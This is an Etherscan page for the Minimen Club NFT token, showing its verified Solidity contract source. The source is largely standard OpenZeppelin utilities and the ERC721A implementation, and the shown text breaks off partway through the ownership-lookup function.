ETH Price: $3,407.56 (-1.50%)
Gas: 8 Gwei

Token

Minimen Club (MM)
 

Overview

Max Total Supply

417 MM

Holders

95

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
caiiiyua.eth
Balance
1 MM
0x84f6f9867ac2c4e8d990825d440cd6da1de3309f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MinimenClub

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-07-08
*/

/**
 * MinimenClub is the first contract in a pair of contracts that allow for a legendary claimable mint.
 * This first contract has many tokens with a select number of the first tokenIds having the ability to claim a
 * token from the second (legendary) collection. Tokens from this collection are minted with onchain randomness
 * meaning that ever call to {mint} will give a random token from the entire collection.
 *
 * Claiming a token not only gives the user a token from the legendary collection, but also a new tokenURI from
 * this collection.
 *
 * Additionally, this contract places a 5 minute transfer hold on recently claimed tokens. This is done to prevent a frontrunner
 * from selling an unclaimed rare token on a marketplace and frontrunning the sale of the transaction with a {claim} call
 * which would result in the buyer recieving a rare token that already has the legendary token claimed even though it
 * would be unclaimed before they initiated the sale.
 */

/*
   Twitter: https://twitter.com/minimenclub
*/

//////////////////////////////////////////////////////////////////////////////////////////////////////
//                                                                                                  //
//                                                                                                  //
//                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@    //
//    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@    //
//    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@    //
//    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@    //
//    @@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//    @@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//    @@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//    @@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@          @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    //
//                                                                                                  //
//                                                                                                  //
//////////////////////////////////////////////////////////////////////////////////////////////////////

// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


/**
 * @dev These functions deal with verification of Merkle Trees proofs.
 *
 * The proofs can be generated using the JavaScript library
 * https://github.com/miguelmota/merkletreejs[merkletreejs].
 * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.
 *
 * See `test/utils/cryptography/MerkleProof.test.js` for some examples.
 *
 * WARNING: You should avoid using leaf values that are 64 bytes long prior to
 * hashing, or use a hash function other than keccak256 for hashing leaves.
 * This is because the concatenation of a sorted pair of internal nodes in
 * the merkle tree could be reinterpreted as a leaf value.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Calldata version of {verify}
     *
     * _Available since v4.7._
     */
    function verifyCalldata(
        bytes32[] calldata proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProofCalldata(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Calldata version of {processProof}
     *
     * _Available since v4.7._
     */
    function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            computedHash = _hashPair(computedHash, proof[i]);
        }
        return computedHash;
    }

    /**
     * @dev Returns true if a `leafs` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, `proofs` for each leaf must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Then
     * 'proofFlag' designates the nodes needed for the multi proof.
     *
     * _Available since v4.7._
     */
    function multiProofVerify(
        bytes32 root,
        bytes32[] calldata leaves,
        bytes32[] calldata proofs,
        bool[] calldata proofFlag
    ) internal pure returns (bool) {
        return processMultiProof(leaves, proofs, proofFlag) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up
     * from `leaf` using the multi proof as `proofFlag`. A multi proof is
     * valid if the final hash matches the root of the tree.
     *
     * _Available since v4.7._
     */
    function processMultiProof(
        bytes32[] calldata leaves,
        bytes32[] calldata proofs,
        bool[] calldata proofFlag
    ) internal pure returns (bytes32 merkleRoot) {
        // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by
        // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the
        // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of
        // the merkle tree.
        uint256 leavesLen = leaves.length;
        uint256 totalHashes = proofFlag.length;

        // Check proof validity.
        require(leavesLen + proofs.length - 1 == totalHashes, "MerkleProof: invalid multiproof");

        // The xxxPos values are "pointers" to the next value to consume in each array. All accesses are done using
        // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's "pop".
        bytes32[] memory hashes = new bytes32[](totalHashes);
        uint256 leafPos = 0;
        uint256 hashPos = 0;
        uint256 proofPos = 0;
        // At each step, we compute the next hash using two values:
        // - a value from the "main queue". If not all leaves have been consumed, we get the next leaf, otherwise we
        //   get the next hash.
        // - depending on the flag, either another value for the "main queue" (merging branches) or an element from the
        //   `proofs` array.
        for (uint256 i = 0; i < totalHashes; i++) {
            bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];
            bytes32 b = proofFlag[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proofs[proofPos++];
            hashes[i] = _hashPair(a, b);
        }

        if (totalHashes > 0) {
            return hashes[totalHashes - 1];
        } else if (leavesLen > 0) {
            return leaves[0];
        } else {
            return proofs[0];
        }
    }

    function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
        return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        /// @solidity memory-safe-assembly
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}

// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)



/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();

/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 *
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
